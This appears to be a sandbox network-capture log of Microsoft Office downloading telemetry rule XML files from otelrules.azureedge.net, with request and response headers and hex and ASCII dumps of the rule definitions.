2024-10-30 02:46:31 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:31 UTC540INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:31 GMT
Content-Type: text/plain
Content-Length: 218853
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public
Last-Modified: Mon, 28 Oct 2024 13:23:36 GMT
ETag: "0x8DCF753BAA1B278"
x-ms-request-id: 174434da-801e-0015-686a-29f97f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024631Z-16849878b78x6gn56mgecg60qc000000096g00000000f26c
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:31 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-10-30 02:46:31 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
2024-10-30 02:46:31 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
2024-10-30 02:46:31 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
2024-10-30 02:46:31 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
2024-10-30 02:46:31 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
2024-10-30 02:46:31 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
2024-10-30 02:46:32 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
2024-10-30 02:46:32 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
2024-10-30 02:46:32 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


Session IDSource IPSource PortDestination IPDestination Port
1192.168.2.44976013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:33 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:33 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:33 GMT
Content-Type: text/xml
Content-Length: 3788
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
ETag: "0x8DC582BAC2126A6"
x-ms-request-id: 85f3058c-201e-00aa-6c2c-283928000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024633Z-15b8d89586f6nn8zqg1h5suba800000002mg00000000bg5e
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:33 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


Session IDSource IPSource PortDestination IPDestination Port
2192.168.2.44975613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:33 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:33 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:33 GMT
Content-Type: text/xml
Content-Length: 450
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
ETag: "0x8DC582BD4C869AE"
x-ms-request-id: 54e1ad71-801e-008f-48b2-272c5d000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024633Z-17c5cb586f6r59nt869u8w8xt800000006h0000000000rfq
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:33 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


Session IDSource IPSource PortDestination IPDestination Port
3192.168.2.44975913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:33 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:33 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:33 GMT
Content-Type: text/xml
Content-Length: 408
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
ETag: "0x8DC582BB56D3AFB"
x-ms-request-id: 11ae3112-301e-005d-596b-27e448000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024633Z-16849878b78fssff8btnns3b1400000007k000000000w8m9
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:33 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session IDSource IPSource PortDestination IPDestination Port
4192.168.2.44975713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:33 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:33 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:33 GMT
Content-Type: text/xml
Content-Length: 2980
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
ETag: "0x8DC582BA80D96A1"
x-ms-request-id: 834668b8-301e-0052-121c-2765d6000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024633Z-16849878b78z2wx67pvzz63kdg000000060000000000fhyr
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:46:33 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


Session IDSource IPSource PortDestination IPDestination Port
5192.168.2.44975813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:33 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:33 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:33 GMT
Content-Type: text/xml
Content-Length: 2160
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
ETag: "0x8DC582BA3B95D81"
x-ms-request-id: fc6998d3-101e-008d-52ad-2692e5000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024633Z-16849878b7898p5f6vryaqvp5800000008bg0000000005nd
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:46:33 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


Session IDSource IPSource PortDestination IPDestination Port
6192.168.2.44976113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:34 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:34 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:34 GMT
Content-Type: text/xml
Content-Length: 474
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
ETag: "0x8DC582B9964B277"
x-ms-request-id: 32193d61-901e-0015-09ca-27b284000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024634Z-17c5cb586f6wmhkn5q6fu8c5ss00000006vg000000005wwk
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
